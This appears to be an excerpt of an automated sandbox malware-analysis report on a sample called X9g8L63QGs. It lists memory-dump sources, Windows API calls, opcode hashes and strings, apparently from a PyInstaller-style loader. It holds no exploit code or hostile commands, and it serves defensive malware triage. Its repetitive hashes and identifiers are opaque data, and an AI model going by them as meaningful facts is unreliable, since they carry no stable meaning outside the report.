                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                                    • Instruction ID: 196df03108c0b67a0c69149d01d69e2a062ec6423346d97a4bd84918263acdb2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10016120A1D64380FA917E217641179D292AF44FB0FD44535E9DCA2FC6DFFCA841C631
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                    • Instruction ID: 71e3157fbbde9fb95c5752c33539bcd52b2694d566f9896582544ca6c8014d2e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CE08CA0E08A0382F7113EA425C217990224FA5B61FD04430E99836BC3DFEC6C48E231
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF7C267B39A,?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA), ref: 00007FF7C267EC5D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                    • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                                    • Instruction ID: c1f7190f4f322722de4797dc421df0ae82eaed660f2cfc366021f8e2f51e7769
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF06248B09306C1FE567E6568512B5C2925F85FA0FCC5430C99EA6BD1EF9CE484C230
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF7C2670D00,?,?,?,00007FF7C267236A,?,?,?,?,?,00007FF7C2673B59), ref: 00007FF7C267D6AA
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction ID: 848aef8e66b9ae2dcdc6520eb95cc69ce6eedd6ff6394df9b344bcc75ee78248
• Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction Fuzzy Hash: BAF03004A0934285FE547F61A85127491D24F54FB0FA80A3098AE65BC1DF9CA480C230
APIs
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665830
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665842
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665879
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266588B
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658A4
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658B6
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658CF
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658E1
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26658FD
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266590F
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266592B
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266593D
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665959
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C266596B
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665987
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C2665999
• GetProcAddress.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26659B5
• GetLastError.KERNEL32(?,00007FF7C26664BF,?,00007FF7C266336E), ref: 00007FF7C26659C7
Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction ID: f2a5b4bd9c2fd897c85cc4b5f87e566afe041e9fffc40374df1141c532bf7dc7
• Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction Fuzzy Hash: A522B224A09B47C1FA58BF65B8515B4A2A2BF14774FD41039C89E62FA0EFFCA148D374
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
• Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
• Instruction ID: 549b68fb0e060ab6030097ec381d2fae2ac44ae06c2eebc0143070717df2096c
• Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
• Instruction Fuzzy Hash: 60B2D272A18282CBE7659E64D4407FDB7A2FB54398F901135DA4D67F84DFF8A900CB60
Strings
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
• Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
• Instruction ID: cb0cbca59075461ace54952edd81c68b69f65d72b28313084c5fa922eceee3ef
• Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
• Instruction Fuzzy Hash: 09521772A146A68BD7949F24C458B7E7BBEFB44350F414138E68AA3BC0DB7CD840CB64
APIs
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                    • Instruction ID: 400b83bea7cef8e0c14871020ebddf1f45a990fb5492cc33ac75873d06ac58f7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A315E76608B8186EB609F60E8903EEB365FB84714F44403ADA8D57F95EF7CC548C724
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685CB5
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268561C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9CE
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: GetLastError.KERNEL32(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9D8
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C267A94F,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267A979
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C267A94F,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267A99E
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685CA4
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268567C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F1A
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F2B
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F3C
                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C268617C), ref: 00007FF7C2685F63
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4070488512-0
                                                                                                                                                                                                                                                                    • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                                    • Instruction ID: 153666d6b2b4f9493ebea2b2f4a0f6c92abdb3709e625c196cd5298ee007d9b1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD1B222A08242C5E720BF25D8811B9E792EF447A8FD18136DA8D67F95EFBCE451C770
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                    • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                    • Instruction ID: d2ca4c29434095923aee58e97aed98ed29ae930dede06a9d202c33ac9a3908df
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA318336608B81C5DB60EF24E8502AEB3A1FB88764F940135EA9D57F54DF7CC555CB20
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                                    • Instruction ID: 804be66aa415fc0c0ff62cb65c4e5ee46f53693a4e57f48ce2c552bfb43b39a1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23B19322B18692C1EA61AF29A4001B9E352EB44BF4F845175DADD67F85EFBCE441C330
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F1A
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268567C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F2B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268561C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7C2685F3C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2685638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C268564C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9CE
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: GetLastError.KERNEL32(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9D8
                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C268617C), ref: 00007FF7C2685F63
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
• Instruction ID: ae6500d5c2ae3bdb708ca43380b5aa46c654452a92e45c69f5a662011a7a9714
• Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
• Instruction Fuzzy Hash: 5E517022A08682C6E750FF21D9815A9E762FB487A4FC14136DA8D63F96DFBCE450C770
APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
• Instruction ID: f2dc8be60804aba7e7e03783625864d59ef83831a2eafb78f0fe85ca625819fa
• Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
• Instruction Fuzzy Hash: EC111F26B14B05C9EB00EF70E8552B973A4F719768F440E31DA9D96B64EFB8D164C360
APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
• Instruction ID: 28415d86f2d5360ad3e54c048a095c04f03d89a0a33cd4c00f36c0d542203560
• Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
• Instruction Fuzzy Hash: B7C1F472B18286C7D7249F19A04467AF7A2F794794F808135DB8E63B84DFBDE810CB50
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: $header crc mismatch$unknown header flags set
• API String ID: 0-1127688429
• Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
• Instruction ID: f04908ffd292f035b59bd06ef33535a7e5f82c285b6e6866116515b032110141
• Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
• Instruction Fuzzy Hash: 29F1D572A543C58BE795AF14C088B3EBAFAFF44750F454538DA8967B90CBB8E840C764
APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
• Instruction ID: 01c2b1729d9357b9b2ec9a2e88113b03f8b0955ceecfc3cc400a1e956c673860
• Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
• Instruction Fuzzy Hash: 13B18D73A05B89CBEB15CF29C84636C77A1F744B58F188821DA9E83BA4CF79D451C720
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
• Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
• Instruction ID: a050d031d18a7f2591c43319060f3f1c5f030e40d956bb1ee921687e242aa015
